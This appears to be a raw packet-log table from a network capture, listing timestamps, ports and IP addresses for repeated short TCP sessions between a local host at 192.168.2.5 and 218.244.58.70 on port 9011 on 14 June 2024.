Jun 14, 2024 16:41:09.284671068 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.289633036 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.294270039 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.299256086 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.318219900 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.323498011 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.328587055 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.333689928 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.339329958 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.344238043 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.350419998 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.360868931 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.361659050 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.367290974 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.373918056 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.379090071 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.409452915 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.414310932 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.429519892 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.434515953 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.464170933 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.469038963 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.485774040 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.490606070 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.513093948 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.518004894 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.537729979 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.542887926 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.549770117 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.554680109 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.565763950 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.570736885 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.577521086 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.582416058 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.595016003 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.599885941 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.608103037 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.613504887 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.633455992 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.638619900 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.642263889 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.647140026 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.659902096 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.664706945 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.674273014 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.679153919 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.684494019 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.689341068 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.694772005 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.699651003 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.702234983 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.707967997 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.725966930 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.731065035 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.745183945 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.750053883 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.755393982 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.760365963 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.776880980 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.781806946 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.808279991 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.813519001 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.823165894 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.829278946 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.843164921 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.848303080 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.862272024 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.867098093 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.884290934 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.889055014 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.898030043 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.902976036 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.918209076 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.923173904 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.938798904 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.944174051 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.953605890 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.958937883 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.979111910 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:09.984466076 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:09.996288061 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:10.004261971 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:10.041268110 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:10.046057940 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:10.055532932 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:10.060422897 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:10.079226017 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:10.085387945 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:10.113632917 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:10.118455887 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:10.190974951 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:10.195947886 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:10.203735113 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:10.208589077 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:10.214653015 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:10.220004082 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:10.227555037 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:10.233738899 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:10.236898899 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:10.241703033 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:10.251607895 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:10.256599903 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:10.260145903 CEST	9011	52065	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:10.260221958 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:10.261146069 CEST	52065	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.415785074 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.420716047 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.420819044 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.421304941 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.426224947 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.426305056 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.431159973 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.440644026 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.445488930 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.457959890 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.463495970 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.471065044 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.476017952 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.478720903 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.483648062 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.492679119 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.497771978 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.520728111 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.525590897 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.539284945 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.544265032 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.552514076 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.558556080 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.581576109 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.586433887 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.604964018 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.609849930 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.641546011 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.646481037 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.673108101 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.679151058 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.687345028 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.692548990 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.703618050 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.708637953 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.721189022 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.726315022 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.748109102 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.753137112 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.761903048 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.766814947 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.775170088 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.780122995 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.793412924 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.799364090 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.806732893 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.812901974 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.829969883 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.834836960 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.874466896 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.879409075 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.920063972 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.925090075 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.937025070 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.941992998 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:15.966713905 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:15.971843958 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:16.012904882 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:16.018928051 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:16.052918911 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:16.057854891 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:16.118706942 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:16.121742010 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:16.121877909 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:16.121927023 CEST	52066	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:16.123586893 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:16.126642942 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:16.126817942 CEST	9011	52066	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.223526955 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.228379011 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.228450060 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.229302883 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.234112978 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.234168053 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.239202976 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.257174969 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.262093067 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.283962011 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.288780928 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.358153105 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.363207102 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.397902012 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.403222084 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.423294067 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.428175926 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.446185112 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.453752041 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.482347012 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.487271070 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.512697935 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.518107891 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.577874899 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.583934069 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.595128059 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.600120068 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.603022099 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.608943939 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.629378080 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.635277033 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.640553951 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.645528078 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.666954994 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.671996117 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.679539919 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.684813976 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.719722033 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.725976944 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.738662958 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.743633986 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.768500090 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.774036884 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.783992052 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.790152073 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.803478956 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.809624910 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.828809023 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.834985018 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.844626904 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.850071907 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.863132000 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.869705915 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.883542061 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.890639067 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.900593996 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.908546925 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.923846960 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.927148104 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.927377939 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.927762985 CEST	52067	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:21.931107998 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.935249090 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:21.937547922 CEST	9011	52067	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:26.956975937 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:26.963247061 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:26.963347912 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:26.964127064 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:26.969468117 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:26.974515915 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:26.980479002 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.009942055 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.015043974 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.031580925 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.036653996 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.052836895 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.057807922 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.078057051 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.083103895 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.121217966 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.126399040 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.149257898 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.154575109 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.166265965 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.171219110 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.177387953 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.182279110 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.191237926 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.196162939 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.206020117 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.210808992 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.225964069 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.230806112 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.239504099 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.244335890 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.257920027 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.262995958 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.283545971 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.288511992 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.299639940 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.304584980 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.358093977 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.363291979 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.381217003 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.386091948 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.421118021 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.426115036 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.434567928 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.440432072 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.477123976 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.482027054 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.495537043 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.500744104 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.509927034 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.514873028 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.534804106 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.539648056 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.558377028 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.563544989 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.580812931 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.585707903 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.604970932 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.611260891 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.628309011 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.633312941 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.672292948 CEST	9011	52068	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:27.672684908 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:27.785278082 CEST	52068	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:32.732165098 CEST	52069	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:32.737734079 CEST	9011	52069	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:32.737827063 CEST	52069	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:32.738399982 CEST	52069	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:32.743611097 CEST	9011	52069	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:32.749538898 CEST	52069	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:32.754432917 CEST	9011	52069	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:32.781047106 CEST	52069	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:32.786257982 CEST	9011	52069	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:32.792202950 CEST	52069	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:32.797178984 CEST	9011	52069	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:32.828608036 CEST	52069	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:32.836086035 CEST	9011	52069	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:32.853291988 CEST	52069	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:32.858181953 CEST	9011	52069	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:32.865072012 CEST	52069	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:32.869890928 CEST	9011	52069	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:32.898556948 CEST	52069	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:32.905848026 CEST	9011	52069	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:32.936570883 CEST	52069	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:32.944616079 CEST	9011	52069	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:32.949858904 CEST	52069	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:32.956127882 CEST	9011	52069	218.244.58.70	192.168.2.5
Jun 14, 2024 16:41:32.962536097 CEST	52069	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:41:32.967715025 CEST	9011	52069	218.244.58.70	192.168.2.5
